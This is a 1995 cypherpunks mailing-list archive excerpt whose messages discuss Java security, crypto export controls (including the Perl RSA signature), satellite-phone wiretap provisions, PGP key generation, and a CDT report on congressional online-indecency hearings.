Message-ID: <9507281303.AA08172@sirius.wi.WHU-Koblenz.de>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

>Wolfgang Roeckelein writes:
>> No, I was referring to a case, where a third party game cartridges
>> manufacturer reverse engineered the specifications of the game
>> cartridges slot for producing his own cartridges for this game.
>
>Sounds like _Sega v. Accolade_, 977 F.2d 1510 (9th Cir., 1993). 

>I don't have it in front of me, but Terry Carroll's Copyright FAQ
>(ftp://rtfm.mit.edu/pub/usenet/news.answers/law/copyright/faq/part2)
>cites it for the proposition that dissasembly of a copyrighted work
>can be fair use if there is no other way to reach noncopyrightable
>(functional, not expressive) elements of an existing work. 



Yes, thank you for pointing this out. I'm glad that I was right with Sega...

  Wolfgang
---
Dipl.-Wirtsch.-Inf.	Voice:	+49 261 6509 173
Wolfgang Roeckelein	Fax:	+49 261 6509 179
WHU Koblenz		E-Mail:	roeckelein@wi.whu-koblenz.de
Burgplatz 2			(NeXTmail ok)
D-56179 Vallendar	WWW:	http://www.whu-koblenz.de/~wolfgang/
Germany
--rsa--------------------------------8<-------------------------------------
#!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL
($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%
Sa2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print pack('H*'
,$_)while read(STDIN,$m,($w=2*$d-1+length($n||die"$0 [-d] k n\n")&~1)/2)
-------------------------------------8<-------------------------------------
TRY: echo squeamish ossifrage | rsa -e 3 7537d365 | rsa -d 4e243e33 7537d365
Residents of the USA & France *MUST NOT* include this .sig if following up!
*** Residents of France & Russia *MUST NOT* make any use of this -sig !  ***




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Fri, 28 Jul 95 13:07:53 PDT
To: perry@piermont.com
Subject: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <9507281410.AA07271@snark.imsi.com>
Message-ID: <199507282003.AA24860@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   Reply-To: perry@piermont.com
   X-Reposting-Policy: redistribute only with permission
   Date: Fri, 28 Jul 1995 10:10:59 -0400
   From: "Perry E. Metzger" <perry@imsi.com>
...
   I exagerate only slightly. I don't believe Java to be secure, in spite
   of the claims. Its too complicated, and it operates in an environment
   who's correct operation is required for it to remain secure. Good
   system design says that you want a system's failure mode to produce a
   secure result, but thats not what Java does.

   Perry

How would you make Java secure or create a secure Javalike language?
(Secure to your satisfaction, of course).

I don't even play a security consultant on TV, but would removing hooks
into X-windows (if it has them; I don't know if it does, although Ray
mentioned something about how it could open multiple windows with graphics
in them, I think) be a good start?

What sort of interface does it have to the filesystem? I would guess that
a secure language would have its own filesystem mapped to a file of fixed
size in the normal filesystem, so that it couldn't cause disaster by
filling your hard disk.

Does it have that?

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Thu, 27 Jul 95 22:31:47 PDT
To: Greg ROSE <Greg_Rose@sibelius.sydney.sterling.com>
Subject: Re: NSA and the NCSA/Apache web servers
In-Reply-To: <9507280320.AA28749@paganini.sydney.sterling.com>
Message-ID: <Pine.HPP.3.91.950728144445.1176D-100000@saturn.mincom.oz.au>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 28 Jul 1995, Greg ROSE wrote:
> A few yuears ago I asked Matt Blaze if he would
> publish CFS with the sryptography removed, and he
> told me that AT&T's lawyers also believed this to
> be true. (So, of course, his answer was "No".)
> The hooks are as important as the crypto code.
> 
> Interestingly though, Kerberos made it to
> Australia (Bond University I think) legally.

I was the person who put the encryption back into that version of 
kerberos (which is now called eBones).  They removed all encryption calls.

They had actually pulled out all calls to the des routines, so we had a 
'working' authentication system that encrypted nothing.
This version was called Bones (they ran a program called parania over 
Kerberos, and that left Bones :-).  When I left, we had Kerberos working 
but I had not tested against 'true' kerberos.  I belive it has been fixed 
by 'those that have followed' and now fully interoperates with MIT 
kerberos v4.  So the 'international' version of kerberos is fully legal.

BTW I wrote libdes (my DES library) as part of this work.  Luckily I have 
    escaped from Kerberos/eBones when I left Bond Uni but my nights are
    still haunted with memories of trying to follow the code :-).

eric (who is having far more fun putting an SSL package together :-)
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups that the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Fri, 28 Jul 95 13:24:37 PDT
To: bdavis@thepoint.net
Subject: Sat phone permit "wire"taps
In-Reply-To: <Pine.D-G.3.91.950728133852.23404F-100000@dg.thepoint.net>
Message-ID: <199507282019.AA27619@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Fri, 28 Jul 1995 13:42:46 -0400 (EDT)
   From: Brian Davis <bdavis@thepoint.net>
   Mime-Version: 1.0
   Content-Type: TEXT/PLAIN; charset=US-ASCII

   On Thu, 27 Jul 1995, Phil Fraering wrote:

   >    From: Ted_Anderson@transarc.com
   > 
   >    I found these paragraphs in a recent Space News interesting.  They were
   >    at the end of an article titled "Military Officials Open To Using
   >                                     ^^^^^^^^^^^^^^^
   >    Civilian Links" in the July 3rd issue. 
   > 
   > [...]
   >      "Iridium, Globalstar, Inmarsat-P and Odyssey all plan to include
   >    features to permit authorized eavesdropping, officials said. 
			   ^^^^^^^^^^

   Did you miss this word?  While I suspect that you don't like Title III 
   wiretaps, they are legal at present.  The above contemplates legal 
   wiretaps on some phone service that might otherwise be outside the reach 
   of legal wiretaps.

You misunderstand. With public key encryption, the proliferation of processor
power and bandwidth, and their funding, there is NO reason whatsoever for the
MILITARY to use an intentionally WEAK encryption system.

   > Hmm. Anyone here ever heard of the Walkers, or the 
   Rosenbergs? > 
   > It's a pity that the military has decided that in its zeal to listen
   > in on phone calls, that national security is an expendable asset.

   The military is not authorized to listen in to any phone calls they want 
   to hear.  Otherwise, everyone on the list, including me, would probably 
   be in some hidden military prison.

   :-)  for the humor-impaired.


I think you misunderstood: if we want a military in the first place
(yes, I realize that's an open question to many people on this list)
it needs to have as much of its communications encrypted as possible.
Without back doors or intentionally weakened algorithms. Otherwise
we're just stuck with a standard conventional force that isn't _that_
great compared to the combined assets of a reasonable assembly of
enemy forces.

I would go even farther: since so many of the troops sent over to the Gulf
in the war there went with K-Mart-purchased GPS receivers that the military
had to turn off selective availability, I am willing to bet that in future
conflicts the U.S. soldier's ability to have secure communications (with
no backdoors or weakened algorithms) is dependent on civilians having access
to the same technology. Because the only way they might have it is if Ma
and Pa go down to the local K-Mart and buy one for their son/daughter about
to go overseas.

(I could add some stuff about GPS vs. Geostar, but I figured I've wasted
enough bandwidth already).

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 28 Jul 95 06:36:32 PDT
To: cypherpunks@toad.com
Subject: Re: Java, Netscape, OpenDoc, and Babel (NewsClip)
Message-ID: <199507281335.PAA27686@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by merriman@arn.net (David K. Merriman) on 
Fri, 28 Jul  3:24 AM


>Still tentative, or is there a Web address?


The mall will be accessible July 31 from a pointer at 
http://www.org.com .


----------


OSF Opens Software Web Mall For Java


Cambridge, MA, July 26 (NB) -- In a
teleconference today, the Open Software Foundation (OSF) 
unveiled
plans to open an Open Software Mall on the Web on July 31, and 
to
start distributing software there this fall that will include 
Java
Ports technology for the Web, DCE (Distributed Computing
Environment) Web, and Microkernel Unification Specification, a
new technology for building cross-platform applications.


At the teleconference, which was attended by Newsbytes, Dr. Ira
Goldstein, chief scientist and executive VP, said that the OSF 
sees
the Open Software Mall as a place for users to access and help 
to
beta test new technologies like Java Ports, DCE Web, and
Microkernel Unification -- being sponsored by the OSF in
conjunction with major vendors -- as well as software from
universities and other research collaborators, and eventually,
outside "open systems" efforts that are "germane to core OSF
technology."


Java Ports, a series of ports of Sun's Java technology for the 
Web,
is being produced by the OSF with Sun, Hewlett-Packard, and 
Novell,
Goldstein told the journalists and analysts. The technology 
will be
available on the Open Software Mall in September, he added.


DCE Web, an application designed to provide the Web with DCE
mechanism for encryption, access control, and naming, is a
collaborative project from the OSF, Hitachi, HP and AT&T.


DCE Web is "consistent with HTTP and secure HTTP," but able to
provide additional services to DCE sites, according to 
Goldstein.


Microkernel Unification -- from the OSF, Hitachi, HP and IBM -- 
is
a technology for building cross-platform databases and other
applications by writing directly to a standard, common 
microkernel
application programming interface (API).


IBM plans to produce a product that is "mostly compliant" with 
the
new specification in the product's first release, and 
"completely
compliant" in its second release, Goldstein noted.


Digital Equipment Corp. might also be participating in the
Microkernel Unification specification project, Goldstein 
reported,
adding that he expects to have an answer on this from Digital
within a week.


>From the OSF's Open Software Mall, users will be able to 
browse,
download, and comment on software executables and software,
documentation plans, design documentation, specifications, and
commentary in hypertext format, according to Goldstein.


The Web mall will also provide Web links to "relevant products,
services, education and consulting available from the 
community,"
he told the teleconference participants.


Java, DCE Web, and Microkernel Unification will each have their 
own
Web stores on the Open Software Mall's ATO (Advanced Technology
Offering) Plaza.


ATOs are software technology projects, which may or may not 
lead
to productization, where participants seek to minimize risk by
obtaining feedback from users, noted the OSF's Peter Shaw. ATO
development costs typically range from $300,000 to $600,000.


For ATO technologies that become productized, licensing rights 
are
estimated at $25,000 per licensee.


The OSF also sponsors other vendor efforts, known as PSTs, in
which vendors are closer to "productization" of their work, and
development costs tend to be higher, said Shaw.


Current PSTs include DCE 1.2 and Motif/CDE (Common Development
Environment). In addition, four potential PSTs are "being 
actively
pursued," Shaw maintained. "We expect to have some 
announcements
on these later this week," he added.


The PSTs will also be given their own area on the Open Software
Mall, to be known as PST Plaza.


Aside from the stores for Java, DCE Web, and Microkernel
Unification, the ATO Plaza will also include "Web pages for a
potpourri of (other) ATOs," according to Goldstein.


Additional areas of the Open Software Mall will include 
"Research
Plaza," the Motif/CD Store, and areas for tools, training, and
consulting.


The mall will officially open next Monday, Goldstein said. 
Initial
offerings will include an explanation of its goals and 
activities,
and the opportunity for user commentary. The mall will be
accessible from a pointer at http://www.org.com .


(Jacqueline Emigh/19950726/Reader Contact: Open Software
Foundation, 617-621-8700; Press Contact: Jane Smeloff,
OSF, 617-621-8997)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Fri, 28 Jul 95 12:41:57 PDT
To: rjc@clark.net (Ray Cromwell)
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <199507281754.NAA11499@clark.net>
Message-ID: <9507281941.AA10821@leonardo.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Ray wrote, responding to me:

| > 	I suspect Ray is working in an environment less security
| > concious than Perry's.  Perry works on a lot of security-critical
| > applications where a lot of money is at stake.  If I were going to go
| > after financial institutions, I'd definetly look at which ones were
| > using Java, and see what I could upload into their systems.  Getting
| > copies of the recent files might be *very* informative.  I'd be
| > worried if I were at Solomon brothers.


|   If a business wants high security, they probably shouldn't be running
| anything but mail. Even allowing users ftp access is dangerous
| because someone could download a trojan horse. My college  took
| the /exec function out of IRC for this very reason. If data can 
| get  through a firewall by any means, DNS, mail, etc, it's possible to write
| some kind of program to send stolen information on those channels. Hell,
| there is a big enough problem with users bringing software from home
| into work and infecting company networks with viruses.

	FTP is available by mail.  So is web access.  Marcus Ranum
(formerly of TIS) has written a TCP/IP over SMTP. (He doesn't
distribute it.)

	The problem of securing a network in this environment is a
very difficult one.  Parts of it can be shown to be hard, although
partial solutions are possible.

	I suspect the risks are enhanced by easy to use clients, as is
the productivity of the workers.  Many experts recommend studying each
service and deciding whether or not to allow it based on a risk
assesment.  The size of Java makes it tough to evaluate, as does its
extensible nature.  I'm tempted to agree with Perry that its too big
and doesn't have enough fail-safes yet.  I'd be much happier if the
Java execution environment did a chroot() before running any code, and
code went to the executor through a one way funnel.  Making this
funnel truely one way limits the nifty things you can do with Java
substantially.

|   Once you actually browse some HotJava web pages with HotJava, the
| ordinary Web becomes static and boring. It's like the difference between
| ftp and Netscape, or TinyMUD and LambdaMOO. There's just so much
| potential, especially for crypto-clients. Because Java provides a
| single development platform, single execution environment, GUI, and
| network access.

	No argument here.  I think Java is way nifty, and might be
enough of a killer app for me to upgrade to a powerPC mac.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher E. Stefan" <flatline@ironhorse.com>
Date: Fri, 28 Jul 95 15:52:11 PDT
To: Cypherpunks List <dc-stuff@fc.net>
Subject: CDT report on Senate and House hearings on Online Pornography
Message-ID: <Pine.LNX.3.91.950728154812.3514F-100000@caboose.ironhorse.com>
MIME-Version: 1.0
Content-Type: text/plain



Somewhat interesting it seems, an ultra-conservative House is the First
Amendment's bigest friend on the Online "porn" issue, while a much more
moderate Senate is it's biggest enemy ... 

-- 
Christopher E Stefan  *  flatline@ironhorse.com  *  finger for PGP key

---------- Forwarded message ----------

-------------------------------------------------------------------------------
------------------------------------------------------------------------
   ******    ********    *************
  ********   *********   *************
  **         **      **       ***               POLICY POST
  **         **      **       ***
  **         **      **       ***               July 26, 1995
  **         **      **       ***               Number 22
  ********   *********        ***
   ******    ********         ***

  CENTER FOR DEMOCRACY AND TECHNOLOGY
------------------------------------------------------------------------
  A briefing on public policy issues affecting civil liberties online
------------------------------------------------------------------------
CDT POLICY POST Number 22                       July 26, 1995

CONTENTS: (1) Senate Judiciary Committee Holds Cyberporn Hearing
          (2) House Science Subcommittees Hold Hearing to Explore 
              Parental Control Technology -- Law Enforcement Officials 
              Say Exon CDA is Wrong Approach
          (3) Subcribe To The CDT Policy Post Distribution List
          (4) About CDT, Contacting US

This document may be re-distributed freely provided it remains in its
entirety.
-------------------------------------------------------------------------

(1) SENATE JUDICIARY COMMITTEE HOLDS CYBERPORN HEARING

SUMMARY

On Monday July 24, 1995 the Senate Judiciary Committee held the first every
hearing on the issue of children's access to inappropriate material on the
Internet. The principal focus of the hearing was to discuss Senator
Grassley's "Protection of Children from Computer Pornography Act of 1995"
(S. 892). CDT Executive Director Jerry Berman testified before the panel.

Senator Grassley (R-IA) deserves praise for holding the first Congressional
hearing on this important issue, as well as for taking great pains to
ensure that both sides of the issue were represented. Although CDT may
disagree with Senator Grassley's approach, we believe that this hearing
represented an essential step towards advancing the dialogue on what has
become an over-hyped and dramatically misunderstood issue.

Senator Grassley's legislation, which has been co-sponsored by several
other prominent members such as Dole, Hatch, and Thurmond, would impose
criminal penalties on a service provider that "knowingly" transmits
indecent material to a minor, or who "willfully" permits its network to be
used to transmit indecent material to a minor (S. 892, Sec (b)(2) &
(b)(3)). 

Two important points emerged from the testimony:

1. Current law prohibits the distribution of obscenity and child
   pornography, as well as online stalking and solicitation of minors.
   As troubling and disturbing as some of the testimony was, no evidence
   was presented that there are gaps in current law which would be
   filled by the Grassley legislation.
 
2. Serious questions exist as to the constitutionality of the Grassley
   Bill. Although Senator Grassley has repeatedly stated that his bill is
   narrowly drawn and targets only the bad actors, no evidence was
   presented to establish that a court would not interpret the statute 
   more broadly, resulting in a complete ban on constitutionally 
   protected speech online.

WITNESSES

Witnesses testifying before the panel included:

* Donnelle Gruff, a 15 year old Florida girl described as a victim of an
  online stalker,
* Patricia Shao, a mother of two from Baltimore MD and volunteer for
  Enough Is Enough
* Dr. Susan Elliot, a mother from McLean VA

* Bill Burrington, Assistant General Counsel, America Online
* Barry Crimmins, a children's rights advocate
* Stephen Balkam, Executive Director, Recreational Software Advisory
  Counsel

* Jerry Berman, Executive Director, Center for Democracy and Technology
* Michael S. Hart, Executive Director of Project Gutteberg, Professor of 
  Electronic Texts, Illinois Benedictine College
* Dee Jepson, Enough Is Enough (an anti-pornography group)

DOES THE GRASSLEY BILL PROTECT CHILDREN?

The testimony of 15 year old Donnelle Gruff focused on her experience as
the victim of a stalker, while Dr. Elliot and Ms. Shao, two mothers of
young children, described how their children had used commercial online
services to access files they deemed inappropriate. 

Donnelle Gruff testified that she had been harassed and stalked by the
sysop of a Florida BBS she had visited. The sysop had obtained her name,
age, and address from her records and reportedly stalked Gruff while she
was at home.

During questioning however, Gruff's step-father told Senator Leahy that
Florida law enforcement officials were currently investigating the case,
and that they had given no indication that current law is insufficient with
respect to prosecuting such cases. Senator Leahy noted that, as difficult
and disturbing as Gruff's case is, it illustrates a need for additional law
enforcement resources and education, but is not an issue of gaps in current
federal or state laws. Senator Patrick Leahy (D-VT) noted similar recent
prosecutions in Florida, and noted that the Grassley legislation does not
explicitly prohibit online stalking of minors.

In addition, Senator Leahy questioned whether government content
restrictions would be an effective solution to protecting children online.
"I hear a lot of rhetoric (from Congress) about getting government out of
our lives, but here it seems as if the rhetoric is a little off of reality.
Parents, not the government, should make the choices" about what their
children should be permitted to access.

Both Dr. Elliot and Ms. Shao testified that their children had stumbled
across material while surfing the Internet that they, as parents, felt
should not be accessible to children. Both described how their children had
accessed "pornographic" images, and had been propositioned for "cybersex"
while visiting a chat room on a commercial online service. In addition, Dr.
Elliot described some of the images as representing 'bestiality and
sodomy'.

Barry Crimmins, a child protection advocate, testified that he has found
numerous images of child pornography on America Online. Crimmins accused
AOL of neglecting to adequately police its network. When questioned by
Senator Leahy, Crimmins acknowledged that the distribution of child
pornography and stalking or solicitation of minors is prohibited under
current law. Crimmins added that while he thought the commercial online
service should do more to remove such material, he believes that more
vigorous enforcement of existing law would help to address his concerns.

WHAT IS THE SCOPE OF THE ISSUE -- IS CURRENT LAW SUFFICIENT?

Often in the course of the debate on this issue, the term "pornographic" is
assumed to be interchangeable with both "indecency" and "obscenity".
However as Senator Feingold (D-WI) noted, "pornography" has no legal
standing, and when legislating in this area Congress must be careful to
avoid confusing these legal distinctions. 

In determining what material would be considered illegal under current law,
the distinction between "obscene" and "indecent" material must be made
completely clear. When pressed by Senator Feingold, Dr. Elliot agreed that
precise definitions are important, but argued that the files that her child
downloaded from the Internet that depicted bestiality and sodomy that would
be, "obscene by any standard". 

Images of bestiality and sodomy, as Dr. Elliot described, would be
considered obscene in virtually every community in the United States, and
hence are illegal under current law. Though it raises difficult
jurisdictional questions, obscenity has been clearly defined by the Courts.
Moreover, current law already prohibits trafficking in obscenity (18 USC
Sec 1462, 1464, 1466) as well as child pornography (18 USC Sec 2252) have
been successfully applied to punish conduct on computer networks. As
Senator Leahy pointed out in his statement, the Justice Department is
currently prosecuting cases involving material similar to that described by
Dr. Elliot.

Indecent material, on the other hand, is constitutionally protected and is
much more difficult to define. The most common understanding of what
constitutes indecent material includes the 7 dirty words, images of nudity,
and other suggestive material. Moreover, the Supreme Court has ruled that
any attempts by government to restrict access to indecent material must be
accomplished in the "least restrictive means", and the determination of
this standard is entirely dependent on the medium (see Sable Communications
v. FCC, 492 US 115; 109 S.Ct. 2829; 106 L.Ed. 2d 93 (1989). 

Some of the material described by the witnesses would be considered
obscene, and hence is already prohibited under current law. Other examples,
including Ms. Shao's description of her daughter being propositioned for
"cybersex", would likely not be considered obscene. 

Senator Russ Feingold (D-WI) urged the committee to carefully consider the
distinctions between "obscene" and "indecent" speech, and urged his
colleagues to "exercise caution and restraint." 

How broadly should we define indecency, Feingold asked Dr. Elliot, "Where
should we draw the line? Should we prohibit playboy? swearing? The Catcher
In The Rye? What about a discussion forum about how to avoid getting
AIDS?". 

Because technologies currently exist to screen out messages such as those
described by Ms. Shao, it is unlikely that a broad prohibition on such
messages would pass constitutional muster. In this case, Congress must look
to other, less restrictive methods of preventing children from having
access to such materials -- including promoting the development and
availability of user control technologies.

CONSTITUTIONAL ISSUES

Throughout the hearing, Senator Grassley stated that his legislation is
carefully crafted and narrowly drawn in order to preserve the first
amendment rights of adults while protecting children from inappropriate
material. Grassley stated that his bill would hold an online service
provider liable only in cases where they "knowingly" allow their network to
be used to transmit indecent material to a minor or "willfully" allow an
individual to use their network to do so. 

However, as CDT's Jerry Berman and America Online's Bill Burrington argued
the wording of the statute and the variety of possible interpretations
could lead to severe chilling effect on the free flow of legitimate
information in cyberspace and force online service providers to limit or
remove certain areas of their service.

BROAD KNOWLEDGE REQUIREMENT

The scope of the "knowing" standard in the Grassley bill is an issue of
some dispute. Senator Grassley and his staff maintain that it is intended
to apply narrowly, but no evidence was presented that demonstrated why a
court would apply a narrow interpretation. Instead, a court is likely to
interpret the "knowing" requirement broadly.

Berman cautioned that because of this uncertainty, online service providers
would be forced to rely on the broadest possible interpretation of the
statute in order to avoid liability, resulting in a severe chilling effect
on all online communications:

"The threat of a broad interpretation of this new statute would compel all
who provide access to the Internet to restrict *all* public discussion
areas and public information sources from subscribers, unless they prove
that they are over the age of eighteen.  Under this statute, a service
provider could note even provide Internet access to a minor *with the
approval* of the child's parent.  Since every online service provider would
have to similarly restrict access to minors, this proposed statute would
create two separate Internets, one for children and one for adults."

America Online's Bill Burrington agreed, stating that the potential for a
broad interpretation of the statute would compel AOL and other online
service providers to adhere to the broadest possible reading in order to
avoid potential liability.  Burrington argued that would force AOL to shut
down many parts of their service and place providers in the unenviable
position of national censor.

"Constitutional guarantees of free speech and press should be cautiously
guarded," Burrington stated, "The online service provider industry should
be encouraged to provide *voluntary* editorial control over its service and
to continue its research and development of parental empowerment technology
tools.  This industry should not be cast in the role of national censor,
determining which information may be fit for children, but nonetheless
subject to criminal liability if it guesses incorrectly in any given
instance." 

Senator Dewine (R-OH) asked several questions of many of the witnesses, and
expressed concerned about the potential for an overly board interpretation
of the knowledge standard.

BROAD INTERPRETATION OF 'INDECENCY'

As addressed earlier, a precise definition of 'indecent' speech has 
never been firmly established, and whether material would be considered
indecent depends largely on the nature of the medium it is communicated
through. Because of this, and because under the Grassley bill carriers
would be liable for transmitting indecent speech, carriers would be forced
to adhere to the broadest, most inclusive definition of indecency. This
would include, among other things, the 7 dirty words, description of
genitalia, nudity, and other material which is protected in other media.

This issue was raised by Michael Hart, Executive Director of Project
Gutteberg, who stressed that broad restrictions on indecency would prevent
people from enjoying serious works of fiction on the Internet. Project
Gutteberg makes electronic texts of books available on the Internet. Hart
stated, with great emotion, that the proposed indecency restrictions
contemplated by the Grassley bill would force him to remove some of
Shakespeare's plays, The Catcher In The Rye, Lady Chattily's Lover, Alice
in Wonderland, and other books which have been classified as indecent in
some parts of the United States. Although such an effect may not be
intended by the drafters of the Grassley legislation, no evidence was
offered at the hearing to counter Mr. Hart's concerns.

EXON vs. BERMAN

CDT's Jerry Berman urged the Committee to act cautiously before voting to
further restrict First Amendment guarantees of freedom of speech.  Berman
urged the Senate to fulfill its traditional role as the "deliberative
body", and to carefully consider the implications before enacting broad new
statutes to cover new media.  Referring to both the Exon CDA and the
Grassley bill, Berman stressed that the country would be better served if
the Senate did not enact legislation simply to "provide the illusion that
the United States Senate could do something in this area".

This remark drew a sharp rebuttal from Senator Exon, who, though not a
member of the Judiciary Committee, sat in on the hearing on the invitation
of Senator Grassley.  Exon defended his bill and accused CDT and others of
launching "viscous attacks" against him and his legislation. Berman was not
given a chance to respond.

"We are concerned about the situation", Exon argued, yet "we are viscously
attacked for trying to have a rational discussion.  We don't want to create
a false sense of security [but] we have a responsibility to protect
children".  In addition, Exon dismissed parental control technologies as
too little too late, arguing that "for every block there is a way around
that block", and that such technologies may not be available in every home,
allowing children to access inappropriate material at the homes of
neighbors who may not employ such tools.

WHAT WAS LEARNED?

Although the hearing did illustrate that sexually explicit material can be
found on the Internet, no substantial evidence was presented to indicate
that law enforcement is currently unable to prosecute violations of
obscenity, child pornography, stalking, or child solicitation laws.
Moreover, although Senator Grassley intends his legislation to be narrow,
serious questions were raised about whether other, more board
interpretations are possible. 

In our opinion, the hearing illustrated that current law is sufficient to
prosecute those who stalk or solicit children online, and that complex
constitutional issues are raised by congressional attempts to restrict
indecent material on the Internet.
 
PATHS TO RELEVANT DOCUMENTS

Testimony is available for most of the witnesses from CDT's Communications
Decency Act Issues page*:

  URL:http://www.cdt.org/cda.html

or from our ftp archive*:

  URL:ftp://ftp.cdt.org/pub/cdt/policy/freespeech

*Due to the volume, these materials may take several days to appear on our site.

---------------------------------------------------------------------------

(2) HOUSE SCIENCE SUBCOMMITTEE HOLDS 'PARENTAL CONTROL TECHNOLOGY' HEARING

Two subcommittees of the House Science Committee held a joint hearing 
today (July 26, 1995) on the availability of parental control technologies
to prevent children from accessing inappropriate material on the Internet.
The hearing, held by the Subcommittee on Basic Research, Chaired by Rep.
Schiff (R-NM) and the Subcommittee on Technology, Chaired by Rep. Constance
Morella (R-FL) provided an important counter-balance to Monday's Senate
Judiciary Committee Hearing.

Witnesses testifying before the committee included:

Witnesses Demonstrating Technology Solutions

* Tony Rutkowski, Executive Director of the Internet Society
* Ann Duvall, President of SurfWatch Software
* Steve Heaton, General Counsel and Secretary, Compuserve

Law Enforcement Witnesses

* Kevin Manson, Federal Law Enforcement Training Center
* Mike Geraghty, Trooper, New Jersey State Police
* Lee Hollander, Assistant States Attorney, Naples Florida

LAW ENFORCEMENT OFFICIALS SAY CURRENT LAW SUFFICIENT, EXON BILL FLAWED

Today's hearing marked the first time law enforcement officials have
testified on the issue of children's access to inappropriate material on
the Internet. All three law enforcement witnesses agreed that, in their
experience, current law is sufficient to prosecute online stalking,
solicitation of minors, and the distribution of pornography and child
pornography. All three said that they are vigorously prosecuting such
cases. 

Instead of enacting new law, New Jersey State Trooper Mike Geraghty said
that protecting children is "a matter of training law enforcement officers,
prosecutors, lawyers and judges about how to enforce existing laws [with
respect to computer networks]. The laws are good, we have to learn how to
enforce them".

The three law enforcement witnesses further argued that the Senate-passed
Exon/Coats Communications Decency Act is the wrong approach to addressing
an issue that is already covered under existing law. "I have several
problems with the Exon bill as a prosecutor, both in terms of its practical
enforcement and its constitutionality" said Florida Assistant States
Attorney Hollander said.

TRANSACTIONAL PRIVACY PROTECTIONS CRITICIZED

In an slightly unrelated asside, Florida Assistant States Attorney Lee 
Hollander criticized privacy protections for online transactional
information privacy protections as a hindrance to law enforcement. 

As part of last years Digital Telephony legislation, the standard for law
enforcemetn access to online transactional records (logs that indicate what
files an individual accessed from online archives and electronic mail
transactions) was raised from a requirement of a mere subpoena to a court
order from a judge based on the showing of "specific and articulable facts"
that such records are "relevant and material to an ongoing criminal
investigation". The higher standard was widely seen as a victory for online
privacy.

In response to a question of what Congress could do to help aid enforcement
of existing law, Hollander noted that the higher standard for online
transactional records adds an additional burden to law enforcement
investigations. Calling it part of a "ballance between privacy and law
enforcement", Hollander did not suggest that Congress should repeal the
court order requirement, only that it made prosecutions more difficult
(*NOTE: Members of CDT staff worked closely on this issue, and consider the
court order standard to be a tremendous victory for online privacy).

EXON CDA CONDEMNED BY ALL

Condemnation of the Senate-passed CDA was not limited to the law
enforcement witnesses. Not a single member of the Subcommittee stated
support for the CDA, and all expressed concern that the issue had not
received sufficient public consideration by Congress. 

Chairwoman Morella stressed that Congress should consider technological
options to empower parents to exercise control over what their children
access online before rushing to enact new laws. Rep. Geren (D-TX) expressed
concern about the First Amendment implications of the CDA. Rep. Vern Elhers
(R-MI) stated that he would "oppose bills that make network access
providers (legally) responsible for the content they carry". In what was
perhaps the strongest condemnation of the Senate-passed Communications
Decency Act, Rep. Zoe Loefgren (D-CA) said, "While well intentioned, the
Exon bill a totally wrong approach and a complete misunderstanding of the
Technology."

PARENTAL CONTROL TECHNOLOGY IS THE ONLY EFFECTIVE SOLUTION

Internet Society Executive Director Tony Rutkowski provided Committee
members with a basic overview of the Internet and described Internet
Society (ISOC) and Internet Engineering Task Force (IETF) are currently
looking at content tagging and other voluntary rating systems for future
Internet protocols. Rutkowski stressed that centralized, command and
control style content restrictions would be ineffective in the global,
distributed network environment of the Internet. Rutkowski further noted
that objectionable material constitutes a minuscule amount (less than .05%)
of the total traffic on the network. 

Because of the global reach of the Internet and the millions of potential
content providers, Rutkowski argued, the only effective means of addressing
the availability of inappropriate material is to provide user control
applications to empower parents to block and filter what the and their
children access. 

SurfWatch President Ann Duvall, demonstrated SurfWatch, and described the
product as "just one example of the computer industry responding to needs
created by the explosive growth of technology".  Duvall stressed that the
industry is developing solutions which are simple to use, inexpensive, and
empower parents to make their own choices about what they or their children
should see. 

Expressing concern about legislative efforts to control content online,
Duvall noted that 30% of the sites blocked by SurfWatch reside outside the







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Fri, 28 Jul 95 08:24:02 PDT
To: cypherpunks@toad.com
Subject: Re: Hooks to Crypto
In-Reply-To: <9507281401.AA26689@all.net>
Message-ID: <Pine.SOL.3.91.950728162002.20916B-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 28 Jul 1995, Dr. Frederick B. Cohen wrote:

> Philo Zimmerman would almost certainly
> win if they ever took him to court, but by harassing him in this more
> subtle way, they destroy the impact of PGP in the marketplace, get MIT
> to support an official (and perhaps customized for the NSA to have weak
> keys) version,

I've personally pulled apart the innards of both MIT pgp 2.6.2 and the 
non-MIT pgp 2.6.2i in order to generate large primes and full RSA keys.  

There are no hacks in MIT pgp that cause it to generate weak keys.


- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Fri, 28 Jul 95 14:27:15 PDT
To: cypherpunks@toad.com
